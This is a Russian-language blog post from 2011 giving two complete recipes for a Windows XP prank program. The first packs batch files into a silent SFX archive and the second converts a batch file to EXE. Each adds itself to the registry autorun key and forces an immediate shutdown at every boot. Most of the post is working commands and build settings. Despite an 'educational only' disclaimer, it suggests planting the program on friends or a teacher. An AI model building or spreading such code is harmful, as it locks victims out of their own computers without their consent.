Нежелательное ПО (пример)

23 апреля 2011 г.

Данная статья написана не для пополнения рядов «хакеров», а исключительно(!) для ознакомления.

Наверное у многих было время, когда знание компьютера уже не на уровне рядового пользователя, и хотелось сделать нечто грандиозное (взломать сервер Пентагона, например), но знаний для этого недостаточно. В таких случаях многие садились за написание вируса или вредной программы.

Я поведаю пример, до которого, со своими скудными на тот момент знаниями, я смог додуматься.

Все ~~гениальное — просто~~ на деле оказалось очень просто.

Первый способ.

Нам понадобится лишь компьютер, winrar (или другой архиватор), и кое-какие знания команд CMD.
Создаем два текстовых файла, меняем расширение на *.bat, пишем в них нужные команды, эти два файла запаковываем в sfx-архив. Всё.

А теперь подробнее о командах.

Содержимое первого bat-файла (пусть будет start.bat):

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Isas /t reg_sz /d "%Systemroot%\System32\Isas.bat" /f exit

Содержимое второго bat-файла (пусть будет Isas.bat):
shutdown -s -f -t 00 exit

Параметры sfx:
Path=%SYSTEMROOT%\system32
SavePath
Setup=start.bat
Silent=1
Overwrite=1

А теперь объяснение:

1. Начнем с конца — Параметры sfx.
Путь распаковки не столь важен, но пусть это будет папка system32 в корне системной папки. Включены флажки «Перезапись», и «Скрыть ход распаковки», после извлечения запускается файл start.bat.

2. Первый bat-файл используется один раз — сразу после извлечения всех файлов. Он прописывает в реестре, в секции авто-запуска, второй файл.

3. Второй файл — собственно сам «зловредный» код. А на деле — это всего-лишь системная команда, которая запускает выключение компьютера через 00 секунд.

Что в итоге:

На выходе файл, примерным размером 50-60 кб. После запуска sfx-файла в системную папку извлекаются два файла, один прописывает второй в авто-запуске. Все. А после следующего включения будет выполняться команда shutdown -s -f -t 00, то есть выключаться. Включаешь — он выключается. И так постоянно, пока не загрузиться в безопасном режиме, и не удалить эти файлы и(или) удалить эту запись в реестре.

Фактического вреда никакого, зато можно подшутить над знакомым, преподом (впоследствии «излечить от страшного вируса», и получить оценку\зачет), и другими.

Второй (более простой способ — до него я дошел попозже)

Нам понадобится программа «Bat To Exe Converter» (из названия можно догадаться о назначении — конвертация BAT-файлов в EXE.
Создаем файл с таким содержанием:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Run /t reg_sz /d "%Systemroot%\System32\WinSys.bat" /f set OUTPUTFILE=%Systemroot%\System32\WinSys.bat echo ^shutdown -s -f -t 00^ >>%OUTPUTFILE%

1-я строчка: В реестре, в секции авто-запуска прописывается файл WinSys.bat
2-я строчка: создается выходной файл «WinSys.bat»
3-я строчка: записывается в выходной файл «WinSys.bat» следующая команда: shutdown -s -f -t 00
Скармливаем этот файл программе «Bat To Exe Converter».
Всё.

Планируемый результат этой статьи — возможно кто-то что-то подчеркнет для себя новое, а кто-то научится противостоять подобным пакостям. Просто, доступно, большое поле для фантазии.

P.S. Актуально для Windows XP.

Теги: рубрика Windows, Программирование